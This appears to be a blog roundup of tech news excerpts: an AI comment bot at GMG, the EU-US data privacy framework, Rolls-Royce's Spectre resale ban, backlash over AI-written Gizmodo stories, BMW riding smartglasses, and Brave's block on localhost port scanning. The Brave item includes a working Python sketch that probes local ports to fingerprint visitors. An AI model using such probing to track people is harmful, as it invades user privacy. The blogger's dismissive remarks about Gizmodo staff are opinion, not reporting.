“The comment-bot posts the first comment on stories to guide conversations and hopefully grow participation and drive users deeper into our engagement funnels,” GMG team member Dustin Block said during the demo. This solves two significant challenges that human comment moderation faces: preventing the loudest voices from dominating the discussion and providing form and structure to the conversation, he explained.
“The bot scans and understands news articles using the GPT 3.5 Turbo API. It generates thought-provoking starters and then it encourages discussions,” he continued. “It’s crafted to be friendly.”
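GMG’s prompts aren’t public, but a minimal sketch of such a comment-starter against the GPT-3.5 Turbo chat API might look like this (the prompt wording, truncation limit, and temperature are assumptions for illustration):

```python
# Minimal sketch of a discussion-opening comment bot in the spirit of GMG's
# demo, via the OpenAI Chat Completions API. Prompts and parameters are
# illustrative assumptions; GMG's actual setup is not public.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

def first_comment(article_text: str) -> str:
    """Ask the model for one friendly question that opens civil discussion."""
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system",
             "content": "You write one friendly, neutral question that invites "
                        "civil discussion of a local news article."},
            # Crude truncation to stay under context limits.
            {"role": "user", "content": article_text[:6000]},
        ],
        temperature=0.7,
    )
    return response.choices[0].message.content

print(first_comment("City council votes tonight on the downtown bike-lane plan..."))
```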
Whether the AI revolution remains friendly to the journalists it’s presumably augmenting remains to be seen, though Macvey isn’t worried. “Most news organizations, especially local news organizations, are so tight on resources and staff that there’s more happening out there than they can cover,” he said. “So I think tools like AI and [the automations seen during the demo day] give the journalists and editorial staff more bandwidth.”
The reason I cite Gizmodo here is that their AI/ML reporting is always on the negative, doom-and-gloom side. AI offers opportunities, and it’s not going away.
Nearly three years after a 2020 court decision threatened to grind transatlantic e-commerce to a halt, the European Union has adopted a plan that will allow US tech giants to continue storing data about European users on American soil. In a decision announced Monday, the European Commission approved the Trans-Atlantic Data Privacy Framework. Under the terms of the deal, the US will establish a court Europeans can engage with if they feel a US tech platform violated their data privacy rights. President Joe Biden announced the creation of the Data Protection Review Court in an executive order he signed last fall. The court can order the deletion of user data and impose other remedial measures. The framework also limits access to European user data by US intelligence agencies.
The Trans-Atlantic Data Privacy Framework is the latest chapter in a saga that is now more than a decade in the making. It was only earlier this year the EU fined Meta a record-breaking €1.2 billion after it found that Facebook’s practice of moving EU user data to US servers violated the bloc’s digital privacy laws. The EU also ordered Meta to delete the data it already had stored on its US servers if the company didn’t have a legal way to keep that information there by the fall. As The Wall Street Journal notes, Monday’s agreement should allow Meta to avoid the need to delete any data, but the company may still end up paying the fine.
Even with a new agreement in place, it probably won’t be smooth sailing just yet for the companies that depend the most on cross-border data flows. Max Schrems, the lawyer who successfully challenged the previous Safe Harbor and Privacy Shield agreements that governed transatlantic data transfers before today, told The Journal he plans to challenge the new framework. “We would need changes in US surveillance law to make this work and we simply don’t have it,” he said. For what it’s worth, the European Commission says it’s confident it can defend its new framework in court.
The first Rolls-Royce EV, the Spectre, is going on sale soon at a cool $425,000 — and at that price, purchasing slots will be limited, to say the least. But any buyers planning to flip one for a quick profit may want to think twice. CEO Torsten Müller-Ötvös said that any customers attempting to resell their Spectre models for profit will be banned for life from ever buying another Rolls-Royce from official dealers, according to a report from Car Dealer.
“I can tell you we are really sanitizing the need to prove who you are, what you want to do with the car – you need to qualify for a car and then you might get a slot for an order,” he said. And anyone who violates the policy and sells the Spectre for a profit is “going immediately on a blacklist and this is it – you will never ever have the chance to acquire again.”
The British, BMW-owned company isn’t the first to impose bans on flipping its vehicles. Last year, GM said it would ban buyers from flipping Hummer EVs, Corvette Z06s and other vehicles within 12 months, under the threat of limiting the transferability of certain warranties. On top of that stick, it offered a carrot in the form of $5,000 in reward points for customers who kept their eighth-generation Corvette Z06s for at least a year.
Soon the deputy editor of Gizmodo’s science fiction section io9 was flagging 18 “concerns, corrections and comments” about an AI-generated story by “Gizmodo Bot” on the chronological order of Star Wars movies and TV shows. “I have never had to deal with this basic level of incompetence with any of the colleagues that I have ever worked with,” James Whitbrook told the Post in an interview. “If these AI [chatbots] can’t even do something as basic as put a Star Wars movie in order one after the other, I don’t think you can trust it to [report] any kind of accurate information.”
The irony that the turmoil was happening at Gizmodo, a publication dedicated to covering technology, was undeniable…
Merrill Brown, the editorial director of G/O Media, wrote that because G/O Media owns several sites that cover technology, it has a responsibility to “do all we can to develop AI initiatives relatively early in the evolution of the technology.” “These features aren’t replacing work currently being done by writers and editors,” Brown said in announcing to staffers that the company would roll out a trial to test “our editorial and technological thinking about use of AI.”
“There will be errors, and they’ll be corrected as swiftly as possible,” he promised… In a Slack message reviewed by The Post, Brown told disgruntled employees Thursday that the company is “eager to thoughtfully gather and act on feedback…” The note drew 16 thumbs down emoji, 11 wastebasket emoji, six clown emoji, two face palm emoji and two poop emoji, according to screenshots of the Slack conversation…
Earlier this week, Lea Goldman, the deputy editorial director at G/O Media, notified employees on Slack that the company had “commenced limited testing” of AI-generated stories on four of its sites, including A.V. Club, Deadspin, Gizmodo and The Takeout, according to messages The Post viewed… Employees quickly messaged back with concern and skepticism. “None of our job descriptions include editing or reviewing AI-produced content,” one employee said. “If you wanted an article on the order of the Star Wars movies you … could’ve just asked,” said another. “AI is a solution looking for a problem,” a worker said. “We have talented writers who know what we’re doing. So effectively all you’re doing is wasting everyone’s time.”
The Post spotted four AI-generated stories on the company’s sites, including io9, Deadspin, and its food site The Takeout.
If you look at Gizmodo’s reporting on AI, you see it’s full of doom and gloom. The writers there know what’s coming, and although they are smart enough to understand what AI is, they unfortunately can’t fathom the opportunities it brings. The way this article is written gives a clue: the deputy editor complains he didn’t get to read the published article beforehand (the entitlement shines through, but let’s be clear, this editor has no right to second-guess the actual editor), and then there’s the job-descriptions quote (who ever had a complete job description? The description may have said simply “editing or reviewing” without any mention of AI, and why should it mention AI at all?).
If you’ve ever been riding your motorcycle and thought it’d be cool to have a Terminator-like head-up display giving you vehicle and navigation data, BMW has just the thing for you. They’re called the BMW ConnectedRide Smartglasses: smart sunglasses with a head-up display (HUD) built into the right lens.
For a smart pair of glasses with a HUD built in, they aren’t too clunky looking. They’re obviously a bit thicker than a normal pair of glasses, but they look pretty sleek, all things considered. Admittedly, unlike Google Glass, they don’t have a built-in camera, so they only need to house a small lithium-ion battery pack and a tiny HUD projector.
The display is pretty small but surprisingly comprehensive. It shows outside temperature, speed, speed limit, gear, and turn-by-turn navigation. For the latter, users can choose either a simplified arrow or a detailed navigation screen with street names and exact directions. According to BMW, a full battery charge will last ten hours, which is more than enough for a day’s worth of riding.
BMW says the glasses can be made to fit a variety of head and helmet shapes, which is said to make them comfortable enough to wear for a full day. The pair also comes with two different lenses: one is 85 percent transparent and designed for helmets with tinted sun visors, while the other is tinted, turning the glasses into sunglasses. Prescription lenses can be fitted by an optician with an RX adapter.
The Brave browser will take action against websites that snoop on visitors by scanning their open Internet ports or accessing other network resources that can expose personal information.
Starting in version 1.54, Brave will automatically block website port scanning, a practice that a surprisingly large number of sites were found engaging in a few years ago. According to this list compiled in 2021 by a researcher who goes by the handle G666g1e, 744 websites scanned visitors’ ports, most or all without providing notice or seeking permission in advance. eBay, Chick-fil-A, Best Buy, Kroger, and Macy’s were among the offending websites.
Some sites use similar tactics in an attempt to fingerprint visitors so they can be re-identified each time they return, even if they delete browser cookies. By running scripts that access local resources on the visiting devices, the sites can detect unique patterns in a visiting browser. Sometimes there are benign reasons a site will access local resources, such as detecting insecurities or allowing developers to test their websites. Often, however, there are more abusive or malicious motives involved.
The new version of Brave will curb the practice. By default, no website will be able to access local resources. More advanced users who want a particular site to have such access can add it to an allow list.
[…]
Brave will continue to use filter list rules to block scripts and sites known to abuse localhost resources. Additionally, the browser will include an allow list that gives the green light to sites known to access localhost resources for user-benefiting reasons.
“Brave has chosen to implement the localhost permission in this multistep way for several reasons,” developers of the browser wrote. “Most importantly, we expect that abuse of localhost resources is far more common than user-benefiting cases, and we want to avoid presenting users with permission dialogs for requests we expect will only cause harm.”
The scanning of ports and other activities that access local resources is typically done using JavaScript that’s hosted on the website and runs inside a visitor’s browser. A core web security principle known as the same origin policy bars JavaScript hosted by one Internet domain from accessing the data or resources of a different domain. This prevents malicious Site A from being able to obtain credentials or other personal data associated with Site B.
The same origin policy, however, doesn’t prevent websites from interacting in some ways with a visitor’s localhost IP address of 127.0.0.1.
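To make the mechanism concrete, here’s a conceptual sketch of the probing logic in Python. Real trackers run the equivalent from in-page JavaScript, timing fetch or WebSocket attempts against 127.0.0.1; plain sockets are used here only to make the logic explicit, and the port list is illustrative:

```python
# Conceptual sketch of the localhost port scanning described above. In the
# wild this runs as in-page JavaScript; Python sockets just make the probing
# logic explicit. Ports shown are common remote-access examples.
import socket

COMMON_LOCAL_PORTS = [3389, 5900, 5938, 6463]  # RDP, VNC, TeamViewer, Discord

def probe(port: int, timeout: float = 0.3) -> bool:
    """Return True if something on 127.0.0.1 accepts a TCP connection."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        return s.connect_ex(("127.0.0.1", port)) == 0

fingerprint = {port: probe(port) for port in COMMON_LOCAL_PORTS}
print(fingerprint)
# The pattern of open and closed ports varies machine to machine, which is
# what makes it usable as a re-identification signal even after cookies
# are cleared.
```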
[…]
“As far as we can tell, Brave is the only browser that will block requests to localhost resources from both secure and insecure public sites, while still maintaining a compatibility path for sites that users trust (in the form of the discussed localhost permission),” the Brave post said.